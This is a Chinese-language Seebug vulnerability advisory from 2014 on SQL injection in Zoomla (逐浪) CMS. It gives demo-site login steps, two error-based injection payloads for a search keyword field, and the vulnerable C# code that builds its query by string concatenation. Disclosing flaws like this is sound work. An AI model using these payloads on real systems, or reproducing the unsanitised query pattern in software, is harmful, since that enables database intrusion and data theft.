逐浪CMS SQL注入

2014-08-06T00:00:00
ID SSV:94214
Type seebug
Reporter Root
Modified 2014-08-06T00:00:00

Description

简要描述:

逐浪cms最新版sql注入

详细说明:

访问

http://demo.zoomla.cn/User/login.aspx

test123

111111

登录 然后访问

http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx

在关键字处输入

1' and (select @@version)>0--

<img src="https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png" alt="73.png" width="600" onerror="javascript:errimg(this);">

点击搜索

<img src="https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png" alt="74.png" width="600" onerror="javascript:errimg(this);">

输入

1' and (select db_name())&gt;0--

<img src="https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png" alt="75.png" width="600" onerror="javascript:errimg(this);">

主要代码如下

protected void Search_Click(object sender, EventArgs e) { string keyWord = this.SearchValue.Text.Trim(); //没处理 int type = DataConverter.CLng(this.DLType.SelectedValue); DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; //跟进 this.Egv.DataSource = defaultView; this.Egv.DataKeyNames = new string[] { "ProjectID" }; this.Egv.DataBind(); }

public DataTable ProjectSearch(int Type, string KeyWord) { string str = string.Empty; switch (Type) { case 0: str = "ProjectName like '%" + KeyWord + "%'"; break; case 1: str = "StartDate like '%" + KeyWord.Trim() + "%'"; break; case 2: str = "ProjectID=" + KeyWord; break; case 3: str = "ProjectIntro like '%" + KeyWord + "%'"; break; case 4: str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')"; break; default: str = "ProjectName like '%" + KeyWord + "%'"; break; } string cmdText = "select * from [ZL_Project] where " + str; return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null); } //keyWord存在注入

漏洞证明:

漏洞证明如上